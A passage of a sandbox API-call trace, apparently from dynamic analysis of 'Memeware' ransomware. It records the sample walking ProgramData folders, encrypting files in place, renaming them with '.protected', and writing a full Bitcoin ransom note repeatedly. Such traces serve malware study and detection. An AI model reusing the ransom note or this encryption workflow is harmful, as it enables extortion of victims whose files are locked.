dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.556] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.556] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.557] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.557] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.557] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.557] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0073.557] CloseHandle (hObject=0xb4) returned 1 [0073.557] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.557] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.558] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0073.558] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.558] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.558] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.559] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.559] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.559] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.559] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.559] CloseHandle (hObject=0xa4) returned 1 [0073.559] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Windows") returned -1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files") returned -1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files (x86)") returned -1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="$Recycle.bin") returned 1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="System Volume Information") returned -1 [0073.559] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 71 [0073.559] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2=".") returned 1 [0073.559] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="..") returned 1 [0073.559] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned 73 [0073.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.560] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.560] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.560] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.560] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.560] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\.") returned 73 [0073.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.560] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.560] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.560] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.560] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.560] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.560] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\..") returned 74 [0073.560] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.560] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.560] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0073.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.560] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0073.560] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0073.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.561] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0073.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.561] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0073.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.561] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0073.561] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0073.562] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.562] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0073.562] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.562] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0073.562] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0073.562] CloseHandle (hObject=0xb4) returned 1 [0073.563] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected") returned 91 [0073.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected")) returned 1 [0073.564] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Windows") returned -1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files") returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files (x86)") returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="$Recycle.bin") returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="System Volume Information") returned 1 [0073.564] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch=".protected") returned 0x0 [0073.564] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="RESTORE_FILES.txt") returned 1 [0073.564] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.564] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".txt") returned 0x0 [0073.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".rar") returned 0x0 [0073.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".zip") returned 0x0 [0073.564] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.574] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.574] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.574] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.574] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0073.581] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0073.581] CloseHandle (hObject=0xb4) returned 1 [0073.607] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected") returned 98 [0073.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected")) returned 1 [0073.607] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.607] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.608] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt") returned 89 [0073.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.609] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.609] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.610] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.610] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.610] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.610] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.610] CloseHandle (hObject=0xa4) returned 1 [0073.610] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.610] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Windows") returned -1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files") returned -1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="System Volume Information") returned -1 [0073.611] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 82 [0073.611] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2=".") returned 1 [0073.611] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="..") returned 1 [0073.611] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned 84 [0073.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.611] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.612] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.612] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.612] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.612] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\.") returned 84 [0073.612] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.612] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.612] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.612] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.612] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned 